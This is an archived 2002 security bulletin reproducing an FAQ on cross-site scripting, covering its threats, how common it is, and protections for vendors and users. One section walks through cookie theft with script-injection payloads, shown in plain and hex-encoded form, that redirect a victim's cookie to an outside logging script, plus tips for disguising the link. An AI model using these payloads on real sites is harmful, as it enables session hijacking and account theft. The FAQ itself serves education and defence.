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Cross Site Scripting white paper
22th May 2002 [SBWID-5355]

	Cross Site Scripting white paper


	Many if not all web services


	zeno of cgisecurity [zeno@cgisecurity.com] released the following  white
	paper, original location is :



	 Editor\'s note : further reading and advance technique may be found at :






	\"The Cross Site Scripting FAQ\"


	 What is Cross Site Scripting?

	 What does XSS and CSS mean?

	 What are the threats of Cross Site Scripting?

	 What are some examples of cross site scripting attacks?

	 Can you show me what cookie theft looks like? 

	 What can I do to protect myself as a vendor?

	 What can I do to protect myself as a user?

	 How common are CSS/XSS holes?

	 Does encryption protect me?

	 Can CSS/XSS holes allow command execution?

	 What if I don\'t feel like fixing a CSS/XSS Hole?

	 What are some links I can visit to help me further understand XSS?                    






	Websites today are more complex than ever, containing a lot  of  dynamic
	content making the experience  for  the  user  more  enjoyable.  Dynamic
	content is achieved through  the  use  of  web  applications  which  can
	deliver different output to a  user  depending  on  their  settings  and
	needs. Dynamic websites have  a  threat  that  static  websites  don\'t,
	called \"Cross  Site  Scripting\"  (or  XSS  dubbed  by  other  security
	professionals). Currently small informational tidbits about  Cross  Site
	Scripting holes exist but none really explain them to an average  person
	or  administrator.  This  FAQ  was   written   to   provide   a   better
	understanding  of  this  emerging  threat,  and  to  give  guidance   on
	detection and prevention.


	 \"What is Cross Site Scripting?\"


	Cross site scripting (also known as XSS) occurs when a  web  application
	gathers malicious data from a user. The data is usually gathered in  the
	form of a hyperlink which contains  malicious  content  within  it.  The
	user will most likely click on  this  link  from  another  website,  web
	board, email, or from an instant  message.  Usually  the  attacker  will
	encode the malicious portion of the link to the site in  HEX  (or  other
	encoding methods) so the request is less suspicious looking to the  user
	when clicked on. After the data is collected by the web application,  it
	creates an output page for the user containing the malicious  data  that
	was originally sent to it, but in a manner to make it  appear  as  valid
	content from the website.


	 \"What does XSS and CSS mean?\"


	Often people refer to Cross Site Scripting as CSS. There has been a  lot
	of  confusion  with  Cascading  Style  Sheets  (CSS)  and   cross   site
	scripting. Some security people refer to Cross Site  Scripting  as  XSS.
	If you hear someone say \"I found a XSS hole\", they are  talking  about
	Cross Site Scripting for certain.


	 \"What are the threats of Cross Site Scripting?\"


	Often attackers will inject  JavaScript,  VBScript,  ActiveX,  HTML,  or
	Flash to fool a user (Read below for further details),  or  gather  data
	from  them.  Everything  from  account  hijacking,  changing   of   user
	settings, cookie theft/poisoning, or false advertising is possible.  New
	malicious uses are being found every  day  for  XSS  attacks.  The  post
	below by Brett Moore brings up a good point with regard to  \"Denial  Of
	Service\", and potential \"auto-attacking\" of hosts if  a  user  simply
	reads a post on a message board.




	 \"What are some examples of cross site scripting attacks?\"


	One product with many XSS holes is  the  popular  PHP  program  PHPnuke.
	This product is often targeted by  attackers  to  probe  for  XSS  holes
	because  of  its  popularity.  I  have   included   a   few   links   of
	advisories/reports that have been discovered  and  disclosed  just  from
	this product alone. The following collection should  provide  plenty  of






	 \"Can you show me what XSS cookie theft looks like?\"


	Depending on the particular web application some of  the  variables  and
	positioning of the injections may need to be adjusted. Keep in mind  the
	following is a simple example of an attacker\'s methodology.

	 Step 1: Targeting


	After you have found an XSS hole in a  web  application  on  a  website,
	check to see if it issues cookies. If  any  part  of  the  website  uses
	cookies, then it is possible to steal them from its users.

	 Step 2: Testing


	Since XSS holes are different in how they are  exploited,  some  testing
	will need to be  done  in  order  to  make  the  output  believable.  By
	inserting code into the script, its output will be changed and the  page
	may appear broken. (The end result is  crucial  and  the  attacker  will
	have to do some touching  up  in  the  code  to  make  the  page  appear
	normal.) Next you will need to insert some Javascript (or  other  client
	side scripting language) into the URL pointing to the part of  the  site
	which is vulnerable. Below I have provided a  few  links  that  are  for
	public use when testing for XSS holes. These links below,  when  clicked
	on will send the users cookie to  www.cgisecurity.com/cgi-bin/cookie.cgi
	and will display it. If you see a page displaying a cookie then  session
	hijacking of the user\'s account may be possible.


	 Cookie theft Javascript Examples.

	 A example of usage is below.


	ASCII Usage:




	Hex Usage:







	 NOTE: The request is first shown in ASCII, then in Hex for copy and paste purposes.


	 1. \"><script>document.location=\'http://www.cgisecurity.com/cgi-bin/cookie.cgi?\'



	 HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27





	 2. <script>document.location=\'http://www.cgisecurity.com/cgi-bin/cookie.cgi?\'



	 HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74





	 3. ><script>document.location=\'http://www.cgisecurity.com/cgi-bin/cookie.cgi?\'



	 HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74






	These are the examples of \"evil\" Javascript we will  be  using.  These
	Javascript examples gather the users cookie and then send a  request  to
	the cgisecurity.com website with the cookie in the query. My  script  on
	cgisecurity.com logs each request and each cookie. In  simple  terms  it
	is doing the following:

	 My cookie = user=zeno; id=021

	 My script = www.cgisecurity.com/cgi-bin/cookie.cgi


	It sends a request to my site that looks like this.

	 GET /cgi-bin/cookie.cgi?user=zeno;%20id=021 (Note: %20 is a hex encoding for a space)


	This is a primitive but effective way  of  grabbing  a  user\'s  cookie.
	Logs  of  the  use   of   this   public   script   can   be   found   at

	 Step 3: XSS Execution


	Hand out your crafted url or use email  or  other  related  software  to
	help  launch  it.  Make  sure  that  if  you  provide  the  URL  to  the
	user(through email, aim, or other means) that you at  least  HEX  encode
	it. The code  is  obviously  suspicious  looking  but  a  bunch  of  hex
	characters may fool a few people.

	In my example I only forward the user to  cookie.cgi.  A  attacker  with
	more time could do a  few  redirects  and  XSS  combo\'s  to  steal  the
	user\'s cookie, and return them to  the  website  without  noticing  the
	cookie theft.

	Some email programs may execute the Javascript upon  the  opening  of  a
	message or if the Javascript  is  contained  in  a  message  attachment.
	Larger sites like Hotmail do allow  Javascript  inside  attachments  but
	they do special filtering to prevent cookie theft.

	 Step 4: What to do with this data


	Once you have gotten the user to execute  the  XSS  hole,  the  data  is
	collected and sent to your CGI script. Now that you have the cookie  you
	can use a tool like Websleuth to see if account hijacking is possible.

	This  is  only  a  FAQ,  not  a  detailed  paper  on  cookie  theft  and
	modification. A new paper released by  David  Endler  of  iDefense  goes
	into more detail on some of the ways to automatically launch XSS  holes.
	This paper can be found at http://www.idefense.com/idpapers/XSS.pdf.


	 \"What can I do to protect myself as a vendor?\"


	This is a simple answer.  Never  trust  user  input  and  always  filter
	metacharacters.  This  will  eliminate  the  majority  of  XSS  attacks.
	Converting < and > to < and > is also suggested when it  comes  to
	script output. Remember XSS holes can be damaging  and  costly  to  your
	business if abused. Often attackers will disclose  these  holes  to  the
	public, which can erode customer and public confidence in  the  security
	and privacy of your organization\'s site. Filtering  <  and  >  alone
	will not solve all cross site scripting attacks and it is suggested  you
	also attempt to filter out ( and ) by translating them to ( and ).


	 \"What can I do to protect myself as a user?\"


	The easiest way to protect yourself as a user is to  only  follow  links
	from the main website you wish to view. If you visit one website and  it
	links to CNN for example, instead of clicking on it  visit  CNN\'s  main
	site and use its search engine to find the content. This  will  probably
	eliminate ninety percent of the problem. Sometimes XSS can  be  executed
	automatically  when  you  open  an  email  or  attachment.  If  you  are
	receiving email from a person you don\'t know (or  don\'t  like)  don\'t
	trust anything it has to say. Another way  to  protect  yourself  is  to
	turn off Javascript in your browser settings. In IE turn  your  security
	settings to high. This can prevent cookie theft, and  in  general  is  a
	safer thing to do.


	 \"How common are XSS holes?\"


	Cross site scripting holes are gaining popularity among hackers as  easy
	holes to  find  in  large  websites.  Websites  from  FBI.gov,  CNN.com,
	Time.com, Ebay, Yahoo, Apple  computer,  Microsoft,  Zdnet,  Wired,  and
	Newsbytes have all had one form or another of XSS bugs.

	Every month roughly 10-25 XSS holes are  found  in  commercial  products
	and advisories are published explaining the threat.


	 \"Does encryption protect me?\"


	Websites that use  SSL  (https)  are  in  no  way  more  protected  than
	websites that are not encrypted. The web applications work the same  way
	as  before,  except  the  attack  is  taking  place  in   an   encrypted
	connection. People often think that because they see the lock  on  their
	browser it means everything is secure. This just isn\'t the case.


	 \"Can XSS holes allow command execution?\"


	XSS holes can allow Javascript insertion, which may  allow  for  limited
	execution. If an attacker were to exploit a browser flaw (browser  hole)
	it could then be possible to execute commands on the client\'s side.  If
	command execution were possible it would only be possible on the  client
	side. In simple terms XSS holes can be used to help exploit other  holes
	that may exist in your browser.


	 \"What if I don\'t feel like fixing a CSS/XSS Hole?\"


	By not fixing an  XSS  hole  this  could  allow  possible  user  account
	compromise in portions of your site as they get added or updated.  Cross
	Site Scripting has been found in various large sites recently  and  have
	been widely publicized. Left unrepaired, someone  may  discover  it  and
	publish a warning about your company. This may  damage  your  company\'s
	reputation, depicting it as being  lax  on  security  matters.  This  of
	course also sends the message to your clients that you  aren\'t  dealing
	with every problem that arises, which turns into a trust issue. If  your
	client doesn\'t trust you why would they wish to do business with you?


	 \"What are some links I can visit to help me further understand XSS?\"


	\"Cross-site scripting tears holes in Net security\"



	Article on XSS holes



	\"CERT Advisory CA-2000-02 Malicious HTML Tags Embedded  in  Client  Web



	Paper on  Removing  Meta-characters  from  User  Supplied  Data  in  CGI



	Paper on Microsoft\'s Passport System



	Paper on Cookie Theft





	 The webappsec mailing list (Visit www.securityfocus for details)



	 Many Thanks to David Endler for reviewing this document.



	 Published to the Public May 2002

	 Copyright May 2002 Cgisecurity.com




	See recommandations

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